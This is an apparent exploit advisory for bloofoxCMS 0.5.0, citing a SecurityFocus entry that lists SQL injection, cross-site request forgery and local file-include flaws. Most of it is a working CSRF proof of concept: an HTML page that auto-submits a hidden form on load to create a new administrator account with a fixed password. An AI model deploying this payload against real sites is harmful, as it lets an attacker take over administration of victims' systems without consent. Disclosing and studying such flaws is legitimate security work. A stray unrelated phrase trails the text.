source: https://www.securityfocus.com/bid/65019/info bloofoxCMS is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. Multiple cross-site request forgery vulnerabilities 3. A local file-include vulnerability Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, obtain sensitive information, execute arbitrary server-side script code or bypass certain security restrictions to perform unauthorized actions. bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected. [Add Admin] <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://localhost/admin/index.php?mode=user&action=new"> <input type="hidden" name="username" value="Admin"/> <input type="hidden" name="password" value="123456"/> <input type="hidden" name="pwdconfirm" value="123456"/> <input type="hidden" name="3" value="Admin"/> <input type="hidden" name="blocked" value="0"/> <input type="hidden" name="deleted" value="0"/> <input type="hidden" name="status" value="1"/> <input type="hidden" name="login_page" value="0"/> <input type="hidden" name="send" value="Add User"/> </form> </body> </html>
体验盒子
